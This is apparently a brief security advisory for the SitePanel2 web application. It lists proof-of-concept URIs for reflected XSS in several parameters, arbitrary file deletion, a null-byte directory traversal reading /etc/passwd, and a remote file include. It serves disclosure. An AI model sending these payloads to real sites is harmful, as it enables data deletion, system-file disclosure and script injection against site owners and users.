|
SitePanel2 Multiple Input Validation Vulnerabilities
No exploit is required. The following proof of concept URI's are available: http://www.example.com/users/main.php?p=5&do=2&v=177%22%3E[XSS] http://www.example.com/admin/5.php?do=chsev&postid=177&usernamess=test&inadmin=no%22%3E[XSS] http://www.example.com/admin/5.php?do=chsev2&postid=177&usernamess=test&inadmin=no&newsev=4%22%3E[XSS] http://www.example.com/admin/5.php?do=chsev&postid=177%22%3E[XSS]&usernamess=test&inadmin=no http://www.example.com/users/main.php?p=5&do=0&show=closed%22%3E[XSS] http://www.example.com/admin/0.php?do=ratekb&id=11%22%3E[XSS] http://www.example.com/users/main.php?p=6&do=0&v=post&id=11&sec_name=Blah%22%3E[XSS] Arbitrary file deletion proof of concept: http://www.example.com/admin/5.php?do=rmattach&rm=yes&id=../index.php Directory traversal proof of concept: http://www.example.com/users/index.php?lang=en.inc/../../../../../../etc/passwd%00 File include proof of concept: http://www.example.com/users/main.php?p=http://www.example.com |
|
|
Privacy Statement |